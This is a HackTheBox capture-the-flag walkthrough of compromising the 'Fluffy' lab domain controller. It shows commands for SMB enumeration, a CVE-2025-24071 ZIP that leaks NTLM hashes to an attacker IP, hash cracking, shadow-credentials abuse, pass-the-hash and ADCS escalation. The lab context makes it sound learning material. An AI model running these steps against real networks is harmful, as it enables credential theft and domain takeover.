HackTheBox: Fluffy
1. Reconnaissance & SMB Enumeration
Provided Initial Credentials: j.fleischman / [REDACTED]
Initial port scanning indicated a standard Windows Active Directory Domain Controller (dc01.fluffy.htb).
Using the provided credentials, we enumerated SMB shares via nxc and smbclient.
nxc smb dc01.fluffy.htb -u 'j.fleischman' -p '[REDACTED]' --shares
smbclient //dc01.fluffy.htb/IT -U 'fluffy.htb\j.fleischman%[REDACTED]'
The IT share contained three intriguing files:
KeePass-2.58.zip(Password Manager)Everything-1.4.1.1026.x64.zip(File search indexing tool)Upgrade_Notice.pdf(Contextual documentation)
We mounted the share and retrieved the files for local analysis.
sudo mkdir -p /mnt/fluffy-it
sudo mount -t cifs //dc01.fluffy.htb/IT /mnt/fluffy-it -o username='j.fleischman',password='[REDACTED]',domain=fluffy.htb
cp /mnt/fluffy-it/* .
sudo umount /mnt/fluffy-it
2. Vulnerability Discovery (CVE-2025-24071)
Extracting KeePass-2.58.zip revealed a configuration file, KeePass.exe.config. Reviewing the XML highlighted a dangerous configuration:
<loadFromRemoteSources enabled="true" />
Correlating this with recent disclosures pointed to CVE-2025-24071, a vulnerability in Windows File Explorer handling that allows attackers to coerce NTLM authentication (hash capture) when a victim views a maliciously crafted ZIP archive.
3. Initial Access via NTLM Hash Capture
We utilized a public PoC to generate a malicious .zip file designed to trigger an authentication callback to our attacker machine when processed by the system's indexing tool (Everything.exe).
python exploit.py -f Microsoft -i <ATTACKER_IP>
To ensure execution, we injected the malicious XML payload directly into the legitimate KeePass-2.58.zip archive and replaced the file on the IT share.
Catching the Hash: We started Responder to listen for incoming NTLM authentication requests.
sudo responder -I tun0 -v
Shortly after uploading the modified archive, Responder captured the NTLMv2 hash for the user p.agila. We cracked the hash offline using John the Ripper.
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Result: Password cracked: [REDACTED].
4. Lateral Movement & Active Directory Certificate Services (ADCS)
Further AD enumeration revealed that p.agila is a member of the SERVICE ACCOUNT MANAGERS group, which possesses GenericAll rights over the SERVICE ACCOUNTS group.
We leveraged bloodyAD to add p.agila to the SERVICE ACCOUNTS group.
bloodyAD --host 10.10.11.69 -d fluffy.htb -u p.agila -p '[REDACTED]' add groupMember 'Service Accounts' p.agila
The SERVICE ACCOUNTS group contains the winrm_svc account, which holds remote management privileges. However, p.agila only holds GenericWrite, not GenericAll, over winrm_svc, preventing a direct password reset.
Shadow Credentials Attack
To bypass this limitation, we utilized a Shadow Credentials attack via certipy. This technique modifies the msDS-KeyCredentialLink attribute to forge a certificate for PKINIT authentication, allowing us to retrieve the user's NTLM hash without changing their password.
certipy shadow auto -username 'p.agila@fluffy.htb' -password '[REDACTED]' -account winrm_svc
The tool automatically acquired the NTLM hash for winrm_svc. We then authenticated via Pass-the-Hash using WinRM:
evil-winrm -i fluffy.htb -u 'winrm_svc' -H '[REDACTED]'
Result: Gained shell as winrm_svc. User flag secured.
5. Privilege Escalation
Enumeration identified another high-value account, ca_svc, which is a member of the CERT PUBLISHERS group. We repeated the Shadow Credentials methodology to target ca_svc.
First, we ensured p.agila owned the target group:
bloodyAD --host 10.129.248.121 -d 'fluffy.htb' -u 'p.agila' -p '[REDACTED]' set owner 'SERVICE ACCOUNTS' 'p.agila'
Next, we forged credentials for ca_svc:
certipy shadow auto -username 'p.agila@fluffy.htb' -password '[REDACTED]' -account ca_svc
Once we obtained the hash for ca_svc ([REDACTED]), we exploited the account's privileges within the ADCS infrastructure to issue a certificate granting Domain Admin equivalent privileges, completing the escalation path to SYSTEM.
Result: SYSTEM shell obtained. The root flag is located at C:\Users\Administrator\Desktop\root.txt ([REDACTED]).